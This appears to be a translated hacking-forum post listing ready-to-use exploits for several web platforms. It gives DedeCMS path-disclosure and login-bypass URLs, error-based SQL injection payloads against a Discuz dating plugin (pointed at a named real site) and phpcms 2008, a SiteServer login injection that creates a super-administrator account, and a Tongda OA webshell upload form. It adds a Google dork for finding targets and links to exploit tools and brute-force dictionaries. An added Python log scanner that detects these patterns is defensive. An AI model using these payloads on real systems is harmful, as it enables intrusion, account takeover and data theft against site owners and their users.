1. Finding the DedeCMS admin backend


1. The file include/dialog/select_soft.php reveals the DedeCMS admin backend. Older versions let you skip login verification and access it directly, without an administrator account; newer versions simply redirect to the backend.

2. include/dialog/config.php reveals the backend admin path.

3. include/dialog/select_soft.php?activepath=/include/FCKeditor jumps to that directory.

4. include/dialog/select_soft.php?activepath=/st0pst0pst0pst0pst0pst0pst0pst0p discloses the site's absolute path.

5. Some lower versions of DedeCMS skip login verification entirely when this page is accessed and display it directly, and /././././././././ can be used to drop down to the root directory. The access address differs slightly in these versions:

require/dialog/select_soft.php?activepath=/././././././././

The other files in the include\dialog\ directory have the same problem; only the default directory differs. Some of them let you view HTML files as well.

Files with the same problem also include:

include\dialog\select_images.php

include\dialog\select_media.php

include\dialog\select_templets.php

/data/mysql_error_trace.inc

DedeCMS absolute-path disclosure tool: http://pan.baidu.com/share/link?shareid=424516&uk=2754130026



2. Discuz dating plugin (jiaoyou.php) vulnerability


Test exploit:

http://www.gzcity.com/jiaoyou.php?pid=1' or @`'` and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(user())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) or @`'` and '1'='1


http://www.gzcity.com/jiaoyou.php?pid=1' or @`'` and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) or @`'` and '1'='1

By popular demand, here is a Google search keyword I put together: Powered by Discuz! inurl:jiaoyou.php


Exploit tool: http://pan.baidu.com/share/link?shareid=424518&uk=2754130026


3. The ECShop Alipay vulnerability recently disclosed by 360, affecting all versions 2.73 and below

Exploit tool download:

http://pan.baidu.com/share/link?shareid=424515&uk=2754130026



4. SiteServer CMS 0day


Exploit:

Go directly to UserCenter/login.aspx

In the username field enter:

123'insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values('blue','VffSUZcBPo4=','Encrypted','i7jq4LwC25wKDoqHErBWaw==');insert into bairong_AdministratorsInRoles values('Administrator','blue');insert into bairong_AdministratorsInRoles values('RegisteredUser','blue');insert into bairong_AdministratorsInRoles values('ConsoleAdministrator','blue');--

Leave the password empty, enter the captcha and submit.

This inserts a super user into the database with username blue and password lanhai.


For getting a shell from the admin panel, search Baidu yourself for "8 ways to get a webshell from the SiteServer backend".



5. A few small tools for class C range intrusion scanning or internal network intrusion

  iisput, which everyone knows

  The second one, wvs: http://pan.baidu.com/share/link?shareid=424521&uk=2754130026

  The third one, sx: http://pan.baidu.com/share/link?shareid=424527&uk=2754130026



6. Tongda OA getshell

Below I attach the exploit.

Save the code below as 1.html. If you want to test it, just change 192.168.56.139 to your target site.

Exploit:


<form id="frmUpload" enctype="multipart/form-data"
action="http://192.168.56.139/general/vmeet/privateUpload.php?fileName=555.php.111" method="post">Upload a new file:<br>
<input type="file" name="Filedata" size="50"><br>
<input type="submit" value="Upload">
<!-- http://192.168.56.139/general/vmeet/upload/temp/555.php.111    this is where the uploaded web shell ends up -->
</form>



7. phpcms 2008 vulnerability


Exploit:

www.xxxxx.com/preview.php?info[catid]=15&content=a[page]b&info[contentid]=2' and (select 1 from(select count(*),concat((select (select (select concat(0x7e,0x27,username,0x3a,password,0x27,0x7e) from phpcms_member limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)-- a
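As an added defender-side example (not part of the original post), here is a small Python scanner that parses Apache combined-format access-log lines and flags the request patterns described in sections 1, 2, 6 and 7: the DedeCMS include/dialog probes and activepath traversal, the floor(rand(0)*2) error-based injection used against jiaoyou.php and preview.php, and the Tongda OA privateUpload.php upload with a ".php." file name. The log lines and rule names are constructed for this example.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (Apache combined format) for this example.
SAMPLE_LOG = r"""
10.0.0.5 - - [12/Mar/2013:10:01:02 +0800] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.7 - - [12/Mar/2013:10:02:11 +0800] "GET /include/dialog/select_soft.php?activepath=/././././././ HTTP/1.1" 200 880 "-" "Mozilla/5.0"
10.0.0.8 - - [12/Mar/2013:10:03:40 +0800] "GET /jiaoyou.php?pid=1%27%20or%20@%60%27%60%20and(select%201%20from(select%20count(*),concat((select%20user()),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%20or%20@%60%27%60%20and%20%271%27=%271 HTTP/1.1" 500 312 "-" "Mozilla/5.0"
10.0.0.9 - - [12/Mar/2013:10:04:05 +0800] "POST /general/vmeet/privateUpload.php?fileName=555.php.111 HTTP/1.1" 200 44 "-" "Mozilla/5.0"
10.0.0.9 - - [12/Mar/2013:10:04:09 +0800] "GET /general/vmeet/upload/temp/555.php.111 HTTP/1.1" 200 12 "-" "Mozilla/5.0"
10.0.0.3 - - [12/Mar/2013:10:05:00 +0800] "GET /data/mysql_error_trace.inc HTTP/1.1" 404 200 "-" "Mozilla/5.0"
"""

# Combined log format: client ip, identd, user, [timestamp], "METHOD target proto", status, ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Signatures for the request patterns described on this page (rule names are ours).
RULES = [
    ("dedecms_dialog_probe", re.compile(r"/include/dialog/(select_\w+|config)\.php", re.I)),
    ("dedecms_activepath_traversal", re.compile(r"activepath=[^ &]*(?:/\.){2,}", re.I)),  # activepath=/./././
    ("dedecms_error_trace", re.compile(r"/data/mysql_error_trace\.inc", re.I)),
    ("error_based_sqli", re.compile(r"floor\(rand\(0\)\*2\)", re.I)),  # rand()/group by duplicate-key trick
    ("tongda_privateupload_php", re.compile(r"/general/vmeet/privateUpload\.php\?fileName=[^ &]*\.php", re.I)),
    ("tongda_upload_temp_php", re.compile(r"/general/vmeet/upload/temp/[^ ]*\.php", re.I)),
]


def scan_log(text):
    """Return (client_ip, status, rule_name) for every log line matching a rule."""
    hits = []
    for line in text.strip().splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined format
        decoded = unquote_plus(m["target"])  # decode %27, %20 etc. before matching
        for name, pattern in RULES:
            if pattern.search(decoded):
                hits.append((m["ip"], m["status"], name))
    return hits


if __name__ == "__main__":
    for ip, status, rule in scan_log(SAMPLE_LOG):
        print(f"{ip} {status} {rule}")
```

Note that the SiteServer login injection in section 4 is sent in a POST body, so it does not show up in access logs like these; it needs application-level or WAF logging to detect.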



8. A few brute-force / shell backdoor scanning dictionaries: http://pan.baidu.com/share/link?shareid=424534&uk=2754130026